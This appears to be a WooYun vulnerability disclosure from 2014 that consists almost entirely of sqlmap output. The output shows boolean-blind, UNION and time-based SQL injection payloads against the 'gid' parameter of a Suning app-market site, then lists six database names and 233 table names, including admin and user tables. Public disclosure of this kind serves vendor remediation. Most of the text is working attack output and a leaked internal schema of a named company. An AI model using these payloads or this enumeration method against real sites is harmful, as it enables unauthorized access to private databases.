sqlmap identified the following injection points with a total of 0 HTTP(s) reque
Place: GET
Parameter: gid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gid=4 AND 4558=4558&cid=190
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: gid=4 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6274773a,0x574251536c46
71566759,0x3a7566613a), NULL, NULL#&cid=190
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: gid=4 AND SLEEP(5)&cid=190
[17:08:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[17:08:16] [INFO] fetching database names
[17:08:16] [WARNING] reflective value(s) found and filtering out
available databases [6]:
[*] information_schema
[*] suning
[*] suning_app_inner
[*] suning_ios
[*] suning_win
[*] test
Database: suning
[233 tables]
| Permission |
| action |
| activity |
| ad_indexfocus_img |
| ad_indexsoft |
| admin_group |
| admin_module |
| admin_promotion |
| admin_user |
| admin_user_new |
| app_client |
| app_count_app_day |
| app_count_app_hour |
| app_count_detail |
| app_count_device_day |
| app_count_mobile_day |
| app_count_user_day |
| app_device |
| app_imei |
| app_push_apps |
| app_push_log |
| app_software |
| app_sys |
| app_sys_cmd |
| app_temp |
| authorize |
| brand_ext_inner_map |
| brand_external |
| brand_mobile_ext |
| brand_model_map |
| bug_word |
| category |
| category_anzhi |
| category_icon |
| cloud_bootscreen |
| cloud_qrcode_statistics |
| cloud_res |
| ctrl |
| ctrl_copy |
| ctrltype |
| ctrltype_copy |
| department |
| developer |
| developer_appeal |
| developer_msg |
| device_info |
| device_statistics |
| district_day |
| district_hour |
| district_month |
| district_tol |
| district_week |
| down_detail |
| download |
| download_all |
| download_day |
| download_hour |
| download_month |
| download_tol |
| download_week |
| ego_ad_indexfocus_img |
| ego_ad_indexsoft |
| favority |
| feedback |
| feedback_detail |
| friend_links |
| game_ad_indexfocus_img |
| game_ad_indexsoft |
| game_download_all |
| game_download_day |
| game_download_hour |
| game_download_month |
| game_download_tol |
| game_guess |
| game_soft_ranking |
| game_topic |
| game_topic_info |
| group |
| guess |
| h5_category |
| h5_download_day |
| h5_download_hour |
| h5_download_month |
| h5_download_tol |
| h5_maintain_soft |
| h5_soft_tag |
| h5_software |
| h5_tag |
| http_log |
| imei_day |
| imei_hour |
| imei_month |
| imei_tol |
| install_day |
| install_hour |
| install_month |
| install_tol |
| install_week |
| ip_visit |
| keyword |
| list_column |
| log |
| logo_icon |
| manager |
| market |
| market_ad |
| market_cate |
| market_channel |
| market_channel_day |
| market_imei_channel |
| mobile_brand |
| model_drive |
| model_feedback |
| msg |
| msg_forbid |
| news |
| news_app_map |
| news_class |
| news_comment |
| order_soft |
| os_day |
| os_hour |
| os_month |
| os_tol |
| os_week |
| outer_category |
| page_ad_indexfocus_img |
| people_need |
| people_recommend |
| privilege |
| push_id |
| push_software |
| qrcode_channel |
| qrcode_channel_bak |
| qrcode_channel_url |
| qrcode_channel_url_bak |
| quick_entry |
| ratio_day |
| ratio_hour |
| ratio_month |
| ratio_tol |
| ratio_week |
| recommend |
| report |
| role_user |
| score |
| search_day |
| search_keywords |
| search_month |
| search_soft |
| search_soft_bak20140417 |
| search_tol |
| search_week |
| sms_statistics |
| sn_software |
| soft_guess |
| soft_ranking |
| soft_tag |
| soft_ver_log |
| software |
| software_bak20131017 |
| software_copy |
| software_log |
| software_log_copy |
| software_permission |
| software_pool |
| software_safe |
| spread_money |
| spread_operation |
| spread_promotion_goods |
| spread_promotion_setting |
| spread_reward |
| spread_soft_count_day |
| spread_software |
| spread_supplier |
| suit_feedback |
| suit_statistics |
| suit_statistics_day |
| suit_statistics_hour |
| suit_statistics_month |
| suit_version |
| suning_district |
| suning_store |
| suning_user |
| supplier |
| sys_ad |
| sys_ad_stat |
| sys_ad_stat_day |
| sys_brand |
| sys_brand_info |
| sys_cate |
| sys_soft |
| sys_topic |
| sys_topic_info |
| sys_word |
| tag |
| tag_app_map |
| temporary |
| term_district_day |
| term_district_hour |
| term_district_month |
| term_district_tol |
| term_imei |
| term_imei_day |
| term_imei_hour |
| term_imei_month |
| term_imei_tol |
| term_install |
| term_install_old |
| term_install_testlog |
| term_model_day |
| term_model_hour |
| term_model_month |
| term_model_tol |
| term_os_day |
| term_os_hour |
| term_os_month |
| term_os_tol |
| term_ratio_day |
| term_ratio_hour |
| term_ratio_month |
| term_ratio_tol |
| term_stat_by_imei_day |
| term_stat_by_pack |
| term_stat_by_pack_model |
| topic |
| topic_info |
| updatesoft_log |
| verify_reason |
| web |
| web_ad |
| web_notice |
| web_tag |
版权声明:转载请注明来源 U神@乌云 漏洞回应 厂商回应:
确认时间:2014-05-09 18:06